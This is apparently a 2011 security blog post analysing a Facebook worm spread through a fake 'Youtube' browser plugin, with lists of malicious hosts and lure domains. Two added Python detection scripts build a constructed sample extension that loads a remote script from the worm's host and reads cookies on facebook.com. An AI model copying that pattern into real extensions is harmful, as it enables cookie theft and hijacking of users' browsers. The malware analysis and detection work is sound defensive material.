Dec 12, 2011

New Facebook worm installs itself as a Firefox and Chrome browser plugin to spread spam.

This Facebook worm installs itself as a Firefox/Chrome browser plugin to spread the infection and read user cookies. Below is the spam message I received from one of the infected Facebook users.


Once you click the URL above it takes you to a page on a randomly named blogspot.com domain that says "Divx-Plugin Missing" and asks you to "Install Youtube Premium plugin" and press F5. It never plays any video; pressing F5 just reloads the page and activates the newly installed plugin.


It downloads the plugin matching your browser; it targets Chrome and Firefox users. The page embeds an <iframe src="http://betterfinace.com/de.php"> which holds two different download links: "betterfinace.com/youtube.crx" (Chrome) and "betterfinace.com/youtube.xpi" (Firefox).


It prompts the user to install the malicious plugin under the name "Youtube". Once the plugin is installed it can take complete control of your browser.


If you are a Chrome user you will be prompted with the pop-up below.


On exploring "youtube.xpi" I found a specific script, "youtube.js". It contains a link to another JavaScript file hosted on the remote site: "betterfinace.com/script.js".


"script.js" in turn contacts another script, "extra.js". This does the real work: it contains several functions, from reading user cookies to posting spam content.


Below you can see the set of strings that are randomly combined to form the spam description.


Below is the spam message posted by this worm on an infected user's wall. The spam description, image and blogspot domain are chosen at random.


When you click on this post it asks you to share the post in order to play the video; that is how it spreads the infection.


This worm is different from previous ones: it keeps control of the browser and reads your cookies until you remove the installed plugin.

Please follow the below instructions if you're infected with this worm.

If you're a Firefox user go to Tools->Add-ons->Extension->Uninstall


If you're a Chrome user go to Tools->Extensions->Remove




Other similar malicious blogspot domains spreading this infection are as follows:

794eercdv.blogspot.com
air-rated.blogspot.com
boobslivetelevision.blogspot.com
broeosiieee.blogspot.com
cooltosee.info
craftywss.blogspot.com
ddmspoidjds.blogspot.com
droppedontv.blogspot.com
eqwtgggg.blogspot.com
fbhotcelebs.blogspot.com
fghcvndfhf.blogspot.com
foopeere.blogspot.com
fqvideos.blogspot.com
heuheueuiwwi.blogspot.com
i9bgr68.blogspot.com
jekjrehre.blogspot.com
jqiwuhhefdsfk.blogspot.com
kodiwodi.blogspot.com
kwerjwe.blogspot.com
leekjrwhe.blogspot.com
leihhrere.blogspot.com
lelikfieire.blogspot.com
lomevomena.blogspot.com
oplllkitre.blogspot.com
play-all-now.blogspot.com
plugin7th.blogspot.com
plugin8th.blogspot.com
premium-plugin.blogspot.com
presuueiee.blogspot.com
pshueheue.blogspot.com
qwertyasdf2.blogspot.com
ryu5gdtd.blogspot.com
sayshuew.blogspot.com
shockervids.weebly.com
sweiigehre.blogspot.com
toptone10.blogspot.com
toptone9.blogspot.com
ukhreza.blogspot.com
vppoyre.blogspot.com
watchthatblogdze.blogspot.com
woot-on-tv1.blogspot.com
worldofhasppy.blogspot.com
wowomglolya.blogspot.com
yikes-was-it-on-tv12.blogspot.com
yikes-was-it-on-tv20.blogspot.com
ytrutujghjg.blogspot.com


Updated: Jan 18, 2012


Found a similar variant with the post "80 per cento delle persone non può guardare questo video per più di 20 secondi" ("80 percent of people cannot watch this video for more than 20 seconds").



The post links to a fake Facebook apps page. If you use HTTPS you're protected; if not, it contacts http://173.192.215.2/~game/link/ and redirects you to http://checkthisoutvideo.blogspot.com/?new. The blogspot page is specially designed to trap users: as you can see below, it mimics a Facebook page to make you believe it comes from a trusted source. The embedded content in the middle of the page below is loaded from http://updateplugin.info/v/show.html.


It installs a fake browser plugin under the name "Youtube Extension" from these links: "http://updateplugin.info/v/divxc.crx" and "http://updateplugin.info/v/divx.xpi".


The plugin monitors the browser and, whenever you access facebook.com, runs the script updateplugin.info/v/script.js. This script in turn calls firstreaction.altervista.org/extrapost.js, which ends up contacting firstreaction.altervista.org/function.js. That file contains the code that spams your wall with the scam post and then redirects you to a survey via video-divxoms.blogspot.com.
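The behaviour described here and in the December analysis above (a packaged plugin that hooks facebook.com, pulls further script from a remote host and reads cookies) can be spotted without ever running the extension. The following Python script is an added example, not code from this post or from the worm: it unpacks a .xpi or .crx, looks for remote script loads, document.cookie access and a facebook.com hook, and checks the script hosts against the ones named in this post. The sample extension it builds is constructed for the demo and is not the real youtube.xpi; the CRX header handling follows the standard CRX2 layout.

```python
"""Static triage of a browser extension package (.xpi or .crx)."""
import io
import re
import struct
import zipfile

# Plugin/script hosts named in the post (both variants). Anything else a
# reader adds here is their own indicator list.
KNOWN_BAD_HOSTS = {"betterfinace.com", "updateplugin.info",
                   "firstreaction.altervista.org"}

# Remote script load, cookie access and the facebook.com hook described in the post.
REMOTE_SCRIPT_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)/[^\s'"]*\.js""", re.I)
COOKIE_RE = re.compile(r"document\.cookie")
FACEBOOK_RE = re.compile(r"facebook\.com", re.I)


def open_extension(data: bytes) -> zipfile.ZipFile:
    """Open a .xpi (plain zip) or a .crx as a ZipFile.

    A CRX2 file starts with 'Cr24', version, public-key length and signature
    length (little-endian uint32 each), then key, signature and the zip. Any
    other layout falls back to searching for the first zip local-file header.
    """
    start = 0
    if data[:4] == b"Cr24":
        version, pk_len, sig_len = struct.unpack("<III", data[4:16])
        if version == 2:
            start = 16 + pk_len + sig_len
        else:
            start = data.find(b"PK\x03\x04")  # heuristic for other CRX versions
        if start < 0 or start >= len(data):
            raise ValueError("CRX header present but no zip payload found")
    return zipfile.ZipFile(io.BytesIO(data[start:]))


def triage_extension(data: bytes) -> dict:
    """Scan script/manifest members of the package and collect indicators."""
    findings = {"files": [], "remote_script_hosts": set(),
                "reads_cookies": False, "hooks_facebook": False}
    with open_extension(data) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".js", ".json", ".html", ".rdf")):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            findings["files"].append(info.filename)
            findings["remote_script_hosts"].update(
                h.lower() for h in REMOTE_SCRIPT_RE.findall(text))
            findings["reads_cookies"] |= bool(COOKIE_RE.search(text))
            findings["hooks_facebook"] |= bool(FACEBOOK_RE.search(text))
    findings["known_bad_hosts"] = findings["remote_script_hosts"] & KNOWN_BAD_HOSTS
    return findings


def verdict(findings: dict) -> str:
    """'malicious' on a known host; 'suspicious' on the worm's behaviour pattern
    (remote script load plus cookie access) even against hosts not yet listed."""
    if findings["known_bad_hosts"]:
        return "malicious"
    if findings["remote_script_hosts"] and findings["reads_cookies"]:
        return "suspicious"
    return "clean"


def build_sample_xpi() -> bytes:
    """Constructed stand-in for the post's youtube.xpi (not the real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("install.rdf", "<RDF><em:name>Youtube</em:name></RDF>")
        zf.writestr("chrome/content/youtube.js",
                    "if (location.host.indexOf('facebook.com') != -1) {\n"
                    "  var s = document.createElement('script');\n"
                    "  s.src = 'http://betterfinace.com/script.js';\n"
                    "  document.body.appendChild(s);\n"
                    "  var c = document.cookie;\n"
                    "}\n")
    return buf.getvalue()


def build_sample_crx() -> bytes:
    """Same payload behind a CRX2 header with empty key and signature (constructed)."""
    return b"Cr24" + struct.pack("<III", 2, 0, 0) + build_sample_xpi()


if __name__ == "__main__":
    for name, blob in (("youtube.xpi", build_sample_xpi()), ("youtube.crx", build_sample_crx())):
        f = triage_extension(blob)
        print(name, verdict(f), sorted(f["remote_script_hosts"]), f["reads_cookies"])
```

Running it on a real package means passing the file bytes to triage_extension(); the "suspicious" verdict is the useful one, since the worm's hosts change between variants while the load-remote-script-and-read-cookies pattern does not.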


It then opens a page titled "Please Follow Steps to restore your account" and asks you to complete a few surveys, supposedly for security reasons, but this is fake. The spammers' ultimate goal is to make you complete surveys so that they earn a commission for every survey that is completed.


Don't fall prey to these kinds of scam messages. If you have installed the malicious plugin, follow the steps given above to uninstall it.

Recent similar variants are shown below:

"Ecco il video trapelato nastro di Belen Rodriguez con l'Argentina 17 anni con il ragazzo! si perde tutto il vostro rispetto per Belen Rodriguez dopo aver visto questo" ("Here is the leaked tape video of Belen Rodriguez at 17 in Argentina with her boyfriend! You lose all your respect for Belen Rodriguez after watching this")


Redirects to mybestworldings.blogspot.com


Policeman Takes Advantage of a Drunk Girl [video] - OMG!! I can't believe this.


Link in the scam redirects you to http://drunkgirladvantageout.blogspot.com/
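The domains listed in this post (the blogspot lure pages from the December list, plus the plugin and script hosts and redirect targets of both variants) can be turned into a simple log check. The script below is an added example, not from the post: it assumes a proxy log with a timestamp, client address, method and URL per line (the sample lines are constructed), matches each URL's host against the indicators by exact or parent-domain match, and also flags any .crx/.xpi download so that a host the worm moves to next still shows up.

```python
"""Match proxy log lines against the domains named in this post."""
from urllib.parse import urlsplit

# Lure domains from the December list in the post.
LURE_DOMAINS = {
    "794eercdv.blogspot.com", "air-rated.blogspot.com", "boobslivetelevision.blogspot.com",
    "broeosiieee.blogspot.com", "cooltosee.info", "craftywss.blogspot.com",
    "ddmspoidjds.blogspot.com", "droppedontv.blogspot.com", "eqwtgggg.blogspot.com",
    "fbhotcelebs.blogspot.com", "fghcvndfhf.blogspot.com", "foopeere.blogspot.com",
    "fqvideos.blogspot.com", "heuheueuiwwi.blogspot.com", "i9bgr68.blogspot.com",
    "jekjrehre.blogspot.com", "jqiwuhhefdsfk.blogspot.com", "kodiwodi.blogspot.com",
    "kwerjwe.blogspot.com", "leekjrwhe.blogspot.com", "leihhrere.blogspot.com",
    "lelikfieire.blogspot.com", "lomevomena.blogspot.com", "oplllkitre.blogspot.com",
    "play-all-now.blogspot.com", "plugin7th.blogspot.com", "plugin8th.blogspot.com",
    "premium-plugin.blogspot.com", "presuueiee.blogspot.com", "pshueheue.blogspot.com",
    "qwertyasdf2.blogspot.com", "ryu5gdtd.blogspot.com", "sayshuew.blogspot.com",
    "shockervids.weebly.com", "sweiigehre.blogspot.com", "toptone10.blogspot.com",
    "toptone9.blogspot.com", "ukhreza.blogspot.com", "vppoyre.blogspot.com",
    "watchthatblogdze.blogspot.com", "woot-on-tv1.blogspot.com", "worldofhasppy.blogspot.com",
    "wowomglolya.blogspot.com", "yikes-was-it-on-tv12.blogspot.com",
    "yikes-was-it-on-tv20.blogspot.com", "ytrutujghjg.blogspot.com",
}

# Plugin/script hosts and redirect targets named for both variants.
C2_HOSTS = {
    "betterfinace.com", "updateplugin.info", "firstreaction.altervista.org",
    "173.192.215.2", "checkthisoutvideo.blogspot.com", "video-divxoms.blogspot.com",
    "mybestworldings.blogspot.com", "drunkgirladvantageout.blogspot.com",
}

IOC = {**{d: "lure-page" for d in LURE_DOMAINS},
       **{h: "plugin/script host" for h in C2_HOSTS}}


def extract_host(url: str) -> str:
    """Hostname of a URL, tolerating log formats that drop the scheme."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def classify_host(host: str):
    """Label for an exact or parent-domain match against the indicator set, else None."""
    for ioc, label in IOC.items():
        if host == ioc or host.endswith("." + ioc):
            return label
    return None


def scan_log(lines):
    """Return (client, host, label) for every line that hits an indicator or
    fetches a browser extension package; assumed format: ts client method url [...]."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        _ts, client, _method, url = parts[:4]
        host = extract_host(url)
        label = classify_host(host)
        if label is None and url.lower().endswith((".crx", ".xpi")):
            label = "extension download"
        if label:
            hits.append((client, host, label))
    return hits


# Constructed sample log; the timestamps and client addresses are made up.
SAMPLE_LOG = [
    "1323700001.001 192.0.2.10 GET http://www.facebook.com/home.php 200",
    "1323700002.002 192.0.2.10 GET http://plugin7th.blogspot.com/ 200",
    "1323700003.003 192.0.2.10 GET http://betterfinace.com/de.php 200",
    "1323700004.004 192.0.2.10 GET http://betterfinace.com/youtube.xpi 200",
    "1323700005.005 192.0.2.11 GET http://www.example.com/player.xpi 200",
    "1323700006.006 192.0.2.12 GET http://173.192.215.2/~game/link/ 302",
]

if __name__ == "__main__":
    for client, host, label in scan_log(SAMPLE_LOG):
        print(f"{client}\t{host}\t{label}")
```

The parent-domain match is deliberate: the worm's scripts live under paths on these hosts, and a subdomain of a known host should still raise a hit. Clients that fetched a .crx/.xpi from anywhere outside the browser vendors' stores are worth a look even when the host is not yet on the list.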


9 comments:

  1. Thanks sir for making me aware of this scam.

  2. Siva super da, thanks a lot..... nice info... spread it. sathya shankaran

  3. This comment has been removed by the author.

  4. Dear Sir,

    How to get rid of this problem... I'm facing the same.

  5. Hi Mishra,

    If you use Firefox browser then go to Tools->Add-ons->Extension->Uninstall (That Plugin)
    If you use Chrome browser go to Tools->Extensions->Remove (That Plugin)
